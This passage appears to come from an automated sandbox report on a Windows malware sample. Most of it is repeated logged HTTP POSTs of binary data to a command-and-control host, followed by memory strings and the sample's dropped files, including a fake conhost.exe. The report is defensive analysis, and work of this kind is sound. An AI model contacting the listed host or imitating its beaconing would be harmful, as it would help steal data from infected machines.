                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: 304550cm.n9shka.top | Content-Length: 1412 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: 304550cm.n9shka.top | Content-Length: 2528 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: 304550cm.n9shka.top | Content-Length: 1388 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: 304550cm.n9shka.top | Content-Length: 2528 | Expect: 100-continue
                                    Source: global traffic | HTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: 304550cm.n9shka.top | Content-Length: 1400 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: 304550cm.n9shka.top | Content-Length: 1372 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic DNS traffic detected: DNS query: 304550cm.n9shka.top
                                    Source: unknown HTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 304550cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://304550cm.n9P:
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://304550cm.n9shka.top
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000002F22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://304550cm.n9shka.top/
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003194000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000002F22000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://304550cm.n9shka.top/jspollgamesqldle.php
                                    Source: hostcrt.exe, 00000004.00000002.1793730163.0000000003108000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exe Code function: 0_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe File created: C:\Windows\Media\Characters\conhost.exe
